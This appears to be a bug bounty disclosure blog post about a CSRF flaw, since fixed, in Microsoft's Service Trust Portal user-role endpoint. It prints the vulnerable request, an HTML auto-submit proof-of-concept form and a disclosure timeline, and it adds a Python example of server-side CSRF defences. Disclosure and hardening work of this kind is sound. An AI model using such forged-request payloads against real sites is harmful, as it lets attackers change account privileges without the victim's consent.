Microsoft CSRF Vulnerability

Adesh Kolte
Oct 12, 2018 · 2 min read

I am Adesh Nandkishor Kolte, an Independent Security Researcher from India,

and I am also working with SecureLayer7 as a Security Consultant.

Talking about the Microsoft bug bounty, the first point is that they only accept submissions with high impact. A big `NO` to low-hanging fruit, and a big `NO` if you cannot exploit the bug. I was testing one of Microsoft's domains, the Service Trust Portal (STP).
During the testing, I came across the feature below in their portal where you can add Portal users and Portal admins. The Add User feature caught my attention. Generally speaking, while checking out an application I always try to correlate the application workflow with the different attack vectors I could execute, so at that time I straight away thought about CSRF.

Vulnerable URL:

https://trustportal.office.com/onboarding/AddUserRole

POC:-

HTTP Request:-

GET /onboarding/AddUserRole/1110?role=User HTTP/1.1
Host: trustportal.office.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://trustportal.office.com/Onboarding/AddUserRole
Cookie: [Some_value]
Connection: keep-alive

From the above HTTP request we conclude that there is no CSRF token present, and that the state-changing action (assigning a role) is performed with a plain GET request.
Using this loophole I was able to add user roles on behalf of the admin user.

Exploitation:-

<html>
<body>
<!-- The form has no method attribute, so it submits as GET, matching the vulnerable request above. -->
<form action="https://trustportal.office.com/onboarding/AddUserRole/1110">
<input type="hidden" name="role" value="User" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

So I was able to add any user to their Cloud Service Trust Portal by using a CSRF attack.
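For comparison, here is an added example of the server-side checks that would have stopped this request; it is not code from the post or from Microsoft, and it models the handler with plain dicts and an in-memory session store (the names `add_user_role`, `issue_csrf_token`, `SESSIONS` and the sample requests are all constructed for this illustration). It shows the two defects the finding rests on, a state change over GET and no anti-CSRF token, and what rejecting each looks like.

```python
"""Added example (not from the original post): server-side CSRF defence for
the AddUserRole action. Assumptions: requests are plain dicts with keys
method/path/headers/cookies/form, and sessions live in an in-memory dict."""
import hmac
import hashlib
import secrets

# Origin taken from the write-up; everything else here is constructed.
ALLOWED_ORIGIN = "https://trustportal.office.com"

# Constructed session store: session_id -> {"user": ..., "csrf_secret": bytes}
SESSIONS = {}


def create_session(user):
    """Create a logged-in session with its own per-session CSRF secret."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf_secret": secrets.token_bytes(32)}
    return sid


def issue_csrf_token(session_id):
    """Synchronizer token bound to the session; the page embeds it as a
    hidden form field, so a cross-site page cannot read or guess it."""
    secret = SESSIONS[session_id]["csrf_secret"]
    return hmac.new(secret, b"add-user-role", hashlib.sha256).hexdigest()


def add_user_role(request):
    """Hardened handler for /onboarding/AddUserRole/<id>.
    Returns (status, message)."""
    # 1. Refuse state changes over GET: a link, image tag or auto-submitted
    #    form with no method attribute cannot reach the action.
    if request["method"] != "POST":
        return 405, "state-changing request must use POST"
    sid = request["cookies"].get("session")
    if sid not in SESSIONS:
        return 401, "not authenticated"
    # 2. Require the session-bound token, compared in constant time.
    expected = issue_csrf_token(sid)
    supplied = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(expected, supplied):
        return 403, "missing or invalid CSRF token"
    # 3. Defence in depth: the browser-set Origin (or Referer) must be ours.
    source = request["headers"].get("Origin") or request["headers"].get("Referer", "")
    if not source.startswith(ALLOWED_ORIGIN):
        return 403, "cross-site origin"
    target_user = request["path"].rsplit("/", 1)[-1]
    return 200, f"role {request['form']['role']} added to user {target_user}"


def simulate():
    """Replay three constructed requests against the hardened handler:
    the original GET, a forged cross-site POST without a token, and a
    legitimate same-site POST carrying the token. Returns the statuses."""
    sid = create_session("admin")
    base = {"path": "/onboarding/AddUserRole/1110", "cookies": {"session": sid}}
    original_get = dict(base, method="GET", headers={}, form={"role": "User"})
    forged_post = dict(base, method="POST",
                       headers={"Origin": "https://attacker.example"},
                       form={"role": "User"})
    legit_post = dict(base, method="POST",
                      headers={"Origin": ALLOWED_ORIGIN},
                      form={"role": "User", "csrf_token": issue_csrf_token(sid)})
    return tuple(add_user_role(r)[0] for r in (original_get, forged_post, legit_post))


if __name__ == "__main__":
    print(simulate())  # expected: (405, 403, 200)
```

The method check alone would have broken the submitted PoC, since the form above has no `method` attribute and therefore sends GET; the token check is what actually closes the hole, because a forged POST from another origin still carries the victim's cookie but cannot supply a token it never saw.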

They listed me in their Hall Of Fame and Rewarded me with the bounty.

Aug 14, 2017 : Reported to Microsoft Security Response Center.
Aug 20, 2017 : Received initial reply from Microsoft Team. Report triaged.
Aug 25, 2017 : Microsoft Security Team successfully reproduced the bug.
Sep 16, 2017 : Microsoft Security Team Fixed the reported bug.
Oct 01, 2017 : Bounty Awarded of $500 by Microsoft
Disclosed……
